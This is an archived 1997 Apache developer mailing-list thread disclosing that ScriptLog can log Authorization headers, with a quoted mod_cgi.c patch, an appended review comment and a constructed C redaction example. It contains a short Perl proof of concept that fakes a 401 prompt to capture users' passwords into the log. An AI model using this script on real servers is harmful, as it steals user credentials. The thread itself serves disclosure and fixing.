httpd-dev mailing list archives

From Brian Behlendorf <br...@organic.com>
Subject Re: security hole with ScriptLog
Date Sun, 12 Jan 1997 04:50:43 GMT

A patch which closes stdin to the script as soon as the script starts
sending stdout stuff would fix this, as with an earlier hole.  I still want to
hear whether this is doable or silly or not.

	Brian

On Sun, 12 Jan 1997, Rob Hartill wrote:
> Apart from the fact that ScriptLog can dump the "Authorization" header
> into the log when authorized scripts barf, it's not too difficult to
> come up with ways to trigger Auth in other areas of the
> server to capture passwords in the clear.
> 
> Here's a script that causes a 500 error when it thinks it's got the
> password from the user..
> 
> 
> #!/usr/local/bin/perl
> 
> open(GOTCHA, "+</tmp/grab");
> while(<GOTCHA>) {
> 	chomp; 
> 	if ($ENV{REMOTE_HOST} eq $_) {   # been here before ? if so, die.
>              exit;  # 500 error, password now in ScriptLog
> 	}
> }
> 
> # Prompt the user for a password
> print "Status: 401\r\nWWW-Authenticate: Basic realm=\"not-mine\"\r\n\r\n";
> 
> # remember who's been sent a 401
> print GOTCHA "$ENV{REMOTE_HOST}\n"; close GOTCHA;
> 
> -=-=-=-=-=-
> 
> This'll cover the hole until someone works out a way to enable this feature
> safely.
> 
> Index: mod_cgi.c
> ===================================================================
> RCS file: /export/home/cvs/apache/src/mod_cgi.c,v
> retrieving revision 1.4
> diff -u -r1.4 mod_cgi.c
> --- mod_cgi.c   1997/01/02 03:34:57     1.4
> +++ mod_cgi.c   1997/01/12 01:29:12
> @@ -212,6 +212,7 @@
>      fputs("%request\n", f);
>      for (i = 0; i < hdrs_arr->nelts; ++i) {
>        if (!hdrs[i].key) continue;
> +      if (!strcmp(hdrs[i].key, "Authorization")) continue;
>        fprintf(f, "%s: %s\n", hdrs[i].key, hdrs[i].val);
>      }
>      if ((r->method_number == M_POST || r->method_number == M_PUT)
> 
> 
> 
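
Review bot: the strcmp() on the added line is case-sensitive, but HTTP header names are not, so a request that sends "authorization:" or "AUTHORIZATION:" would still have its value written by the fprintf() that follows, unless the keys in hdrs are normalised before this loop. A case-insensitive comparison such as strcasecmp() would close that gap, and Proxy-Authorization carries credentials in the same way and could be skipped alongside it. A short comment above the new test saying why the header is skipped would also help the next reader of the loop.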

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--
brian@organic.com  www.apache.org  hyperreal.com  http://www.organic.com/JOBS
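
An added example, not part of the original message and not Apache's code: a header-logging routine in the spirit of the quoted patch that withholds credential values whatever the case of the header name. The struct hdr type, the function names, the "[withheld]" marker and the inclusion of Proxy-Authorization are assumptions of this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for a request-header table entry; not Apache's own type. */
struct hdr { const char *key; const char *val; };

/* Credential-bearing header names (this example's assumption), matched ignoring case. */
static const char *const secret_hdrs[] = { "Authorization", "Proxy-Authorization" };

static int is_secret(const char *key)
{
    size_t i, j;
    for (i = 0; i < sizeof secret_hdrs / sizeof secret_hdrs[0]; ++i) {
        const char *s = secret_hdrs[i];
        for (j = 0; s[j]; ++j)
            if (tolower((unsigned char)s[j]) != tolower((unsigned char)key[j])) break;
        if (!s[j] && !key[j]) return 1;   /* same length, every character matched */
    }
    return 0;
}

/* Fill buf with header lines; returns values withheld, or -1 if buf is too small. */
int log_request_headers(char *buf, size_t len, const struct hdr *hdrs, int n)
{
    size_t used = 0;
    int i, w, secret, withheld = 0;
    if (len == 0) return -1;
    buf[0] = '\0';
    for (i = 0; i < n; ++i) {
        if (!hdrs[i].key) continue;
        secret = is_secret(hdrs[i].key);
        w = snprintf(buf + used, len - used, "%s: %s\n", hdrs[i].key,
                     secret ? "[withheld]" : hdrs[i].val);
        if (w < 0 || (size_t)w >= len - used) return -1;
        used += (size_t)w;
        withheld += secret;
    }
    return withheld;
}

int main(void)
{
    struct hdr sample[] = {   /* constructed sample; the credential value is made up */
        { "Host", "www.example.com" }, { "authorization", "Basic Y29uc3RydWN0ZWQ=" } };
    char out[256];
    int n = log_request_headers(out, sizeof out, sample, 2);
    fputs(out, stdout);
    return (n == 1 && !strstr(out, "Y29uc3RydWN0ZWQ=")) ? 0 : 1;
}
```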

